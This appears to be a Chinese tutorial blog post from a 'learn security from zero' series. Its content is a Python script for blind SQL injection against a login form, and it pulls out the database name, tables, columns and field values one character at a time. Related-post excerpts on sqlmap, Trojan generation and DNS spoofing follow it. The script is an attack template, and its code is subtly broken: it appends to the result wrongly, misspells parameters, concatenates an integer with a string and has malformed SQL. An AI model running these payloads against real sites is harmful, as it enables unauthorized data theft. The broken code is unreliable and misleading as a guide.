从零开始学安全(三十五)●mysql 盲注手工自定义python脚本
import requests
import string
#mysql 手动注入 通用脚本 适用盲注 可以跟具自己的需求更改
def home():
url="url"
list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?"
s=requests.session()
success = "" # 成功返回的特征
error="" #失败返回的体征
# 1.拿到当前连接数据库长度
leng=0
i=0
while True:
sql="admin%1$\\' or length(database())>"+str(i)+"#"
data={"username":sql,"passwrod":1}
r=s.post(url,data=data).content
if error in r :
leng=i
i=0
break
i+=1
print ("length the database:%d" %leng)
#2.拿到当前连接数据库名
strs=''
for t in range(leng):
for l in list:
sql="admin%1$\\' or ascii(substr(database(),"+str(t)+",1))="+str(ord(l))+"#"
data = {"username": sql, "passwrod": 1}
r=s.post(url,data=data).content
if success in r:
strs+=strs
break
print("database is :%s" % (strs))
#3.拿当前数据库里面的所有表
#拿到数据库表添加的长度
while True:
sql="admin%1$\\' or select length(group_concat(table_name)) from information_schema.tables where table_type='base table' and table_schema=database()<"+i+"#"
data = {"username": sql, "passwrod": 1}
r = s.post(url, data=data).content
if error in r:
leng=i
i=0
break
i+=1
print("length table is :%s" % (leng))
#返回所有表
for t in range(leng):
for l in list:
sql = "admin%1$\\' or ascii(substr(select group_concat(table_name) from information_schema.tables where table_type='base table' and table_schema=database(),"+str(t)+",1))="+str(ord(l))+"#"
data = {"username": sql, "passwrod": 1}
r=s.post(url,data=data).content
if success in r:
strs+=strs
break
print("talbes is :%s" % (strs))
#4.选择先要查询的表 返回表所有字段
#返回长度
table='table'#要查找的表名
tablename = '0x' + table.encode('hex')
table_name = table
while True:
sql = "admin%1$\\' or select length(group_concat(column_name)) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()<" + i + "#"
data = {"username": sql, "passwrod": 1}
r = s.post(url, data=data).content
if error in r:
leng = i
i = 0
break
i += 1
print("length table is :%s" % (leng))
# 返回所有表
for t in range(leng):
for l in list:
sql = "admin%1$\\' or ascii(substr(select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()," + str(
t) + ",1))=" + str(ord(l)) + "#"
data = {"username": sql, "passwrod": 1}
r = s.post(url, data=data).content
if success in r:
strs += strs
break
print("talbes is :%s" % (strs))
# 5.返回相应字段里面的值
num=0
while True:
sql = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
data = {'username':sql,'password':1}
r = s.post(url,data=data).content
if error in r:
num = i
i=0
break
i+=1
pass
print("[+]number(column): %d" %(num))
# 返回长度
table = 'table' # 要查找的表名
col='user'#要返回的字段
for t in range(leng):
for l in list:
sql = "admin%1$\\' or ascii(substr(select "+col+" from limit 0,1 "+table_name+","+str(t)+",1))=" + str(ord(l)) + "#"
data = {"username": sql, "passwrod": 1}
r = s.post(url, data=data).content
if success in r:
strs += strs
break
print("talbes is :%s" % (strs))
从零开始学安全(三十五)●mysql 盲注手工自定义python脚本的更多相关文章
- 从零开始学安全(三十)●使用sqlmap对网站一步步渗透
常规注入步骤第一步注入点-u "url" 判断是否是注入点 有就判断用户的权限第二步获取数据库 所有的 -u "url" --dbs第三步 查看应用程序所有数据 ...
- Python学习日记(三十五) Mysql数据库篇 三
使用Navicate 创建一个连接去使用Mysql的数据库,连接名可以取任意字符但是要有意义 新增一个数据库 填写新数据库名,设置它的字符集和排序规则 新建一个表 增加表中的信息 点击保存再去输入表名 ...
- 三十五.MySQL读写分离 MySQL多实例 、MySQL性能调优
1.实现MySQL读写分离 搭建一主一从结构 配置maxscale代理服务器 测试分离配置 1.1 搭建一主一从结构 192.168.4.51 主 192.168.4.52 从 测试OK 1. ...
- 从零开始学安全(四十五)●browser_autopwn2漏洞利用配合Ettercap工具实施DNS欺骗攻击
系统:kali 2019 工具Ettercap,Metasploit 环境内网地址 首先 cd /etc/ettercap/ 移动在ettercap 文件下 在用vim 打开编辑 etter.dns ...
- 从零开始学安全(三十九)●FCK编辑器解析漏洞
fck 现在存在漏洞的本版分别是 2.4.2 ,2.4.4,2.6.6 可以在 查看版本 2.4.2 在 图片域有上传点 2.4.4 这里有几个按钮,首先是 Get Folders and Files ...
- 从零开始学安全(三十八)●cobaltstrike生成木马抓肉鸡
链接:https://pan.baidu.com/s/1qstCSM9nO95tFGBsnYFYZw 提取码:w6ih 上面是工具 需要java jdk 在1.8.5 以上 实验环境windows ...
- 从零开始学安全(三十六)●利用python 爆破form表单
import sys import requests from requests.auth import HTTPBasicAuth def Brute_Force_Web(postData): re ...
- 从零开始学安全(三十四)●百度杯 ctf比赛 九月场 sqli
先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该 ...
- 从零开始学安全(二十五)●用nmap做端口扫描
以上是常用的端口扫描 -T 用法 每个级别发包时间 当没有使用T 时默认的使用T3级别发包 半开扫描 先探测主机是否存活 再用-sS 扫描端口 容易造成syn 包攻击 就是利用僵尸主机 进 ...
随机推荐
- 如何在mysql客户端即mysql提示符下执行操作系统命令
环境描述: mysql版本:5.5.57-log 操作系统版本:Red Hat Enterprise Linux Server release 6.6 (Santiago) 需求描述: 在mysql的 ...
- 12.JavaScript字符串方法
JS字符串常用方法总结 动态方法:1.str.charAt(index); 返回子字符串,index为字符串下标,index取值范围[0,str.length-1] 动态方法:2.str.charC ...
- layui table分页 page为false时,limit问题
问题描述:table数据表格page设为false时,limit为默认设置10 解决办法:limit设为 Number.MAX_VALUE 加载全部数据 实例: var table = layui.t ...
- Index API
Index API 用于在指定索引中添加或更新类型化的JSON文档,使其成为可搜索的. 以下示例将JSON文档插入“twitter”索引中,类型名为“_doc”,ID为1: PUT twitter/_ ...
- java中List<Map<String, Object>>关于null的判断
List<Map<String, Object>> selectTmFileInfo = fileInfoService.selectTmFileInfoByToken(cTo ...
- linux sqlite3 相关
数据库sqlite 1 用下载好的安装包安装 linux@ubuntu:~/sqlite3$ sudo dpkg -i libsqlite3-0_3.7.2-1ubuntu0.1_i386_1.deb ...
- Java作业十三(2017-11-20)
/*使用一位数组解决 1 1 2 3 5 8 13 数列问题 斐波纳契数列 Fibonacci*/ package cn.GM; public class array { public static ...
- LinkedBlockingQueue 注记
近期看一个音频传输代码时,对方采用了LinkedBlockingQueue为生产者.消费者模式,来支撑读写线程. 个人感觉非常不错,因此也对这种方式进行总结,并梳理了一个基本的功能框架备用.主要两点: ...
- .NET程序员所需要注意的网站资源
一个程序员 需要 对 技术 和 行业 两方面同时具有极大热情和注意力才能让自己在一个新的台阶. 有些程序员是对技术有着极大的热情但是行业完全不注意,这样我感觉只能成为一个专家,并不能让自己真正的质变, ...
- [Swift]LeetCode147. 对链表进行插入排序 | Insertion Sort List
Sort a linked list using insertion sort. A graphical example of insertion sort. The partial sorted l ...